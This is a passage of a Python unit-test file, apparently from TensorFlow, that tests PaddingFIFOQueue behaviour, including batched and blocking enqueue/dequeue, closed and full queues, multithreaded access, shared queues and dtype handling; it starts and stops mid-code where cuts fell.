with self.cached_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (None, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,\?,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
self.evaluate(dequeued_t)
def testParallelEnqueueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(101)
enqueue_op.run()
close_op.run()
# Dequeue up to 101 items in parallel on 10 threads, from closed queue.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(50, dtypes_lib.float32, shapes=((),))
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
self.evaluate(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(self.evaluate(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
enqueue_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = array_ops.placeholder(
dtypes_lib.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(
elements_enqueued, elements_enqueued + count, dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
self.evaluate(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, self.evaluate(dequeued_t))
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(
elements_dequeued, elements_dequeued + count, dtype=np.int32)
self.assertAllEqual(expected_range,
dequeuemany_t.eval({
count_placeholder: count
}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.PaddingFIFOQueue(100, dtypes_lib.int32, ((),))
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.PaddingFIFOQueue(total_count, dtypes_lib.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
self.assertAllEqual(elems[3:], self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
self.evaluate(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], self.evaluate(dequeued_t))
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeued_t)
self.assertEqual(elems[3], self.evaluate(cleanup_dequeue_t))
def close():
self.evaluate(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, (dtypes_lib.float32,
dtypes_lib.float32), ((), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = self.evaluate([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
self.assertEqual([50.0], self.evaluate(dequeued_t))
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
time.sleep(0.01)
self.assertEqual([50.0], self.evaluate(dequeued_t))
self.assertEqual([60.0], self.evaluate(dequeued_t))
# Make sure the thread finishes before exiting.
thread.join()
def testBlockingEnqueueBeforeClose(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
def testDoesNotLoseValue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(1, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.PaddingFIFOQueue(
1, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = data_flow_ops.PaddingFIFOQueue(
1, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_a")
q_a_2 = data_flow_ops.PaddingFIFOQueue(
15, dtypes_lib.float32, ((),), shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_b")
q_b_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.int32, ((),), shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_c")
q_c_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_f")
q_f_2 = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), ((), ()),
shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),)))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.PaddingFIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
q2 = data_flow_ops.PaddingFIFOQueue(15, dtypes_lib.float32, ((),))
enq_q = data_flow_ops.PaddingFIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
@test_util.run_deprecated_v1
def testResetOfBlockingOperation(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q_empty = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(2, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8, dtypes_lib.int64,
dtypes_lib.bool, dtypes_lib.complex64, dtypes_lib.complex128
]
shape = (32, 4, 128)
q = data_flow_ops.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes_lib.bool:
np_array = np_array > 0
elif dtype in (dtypes_lib.complex64, dtypes_lib.complex128):
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = self.evaluate(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
data_flow_ops.PaddingFIFOQueue(32, [dtypes_lib.float32],
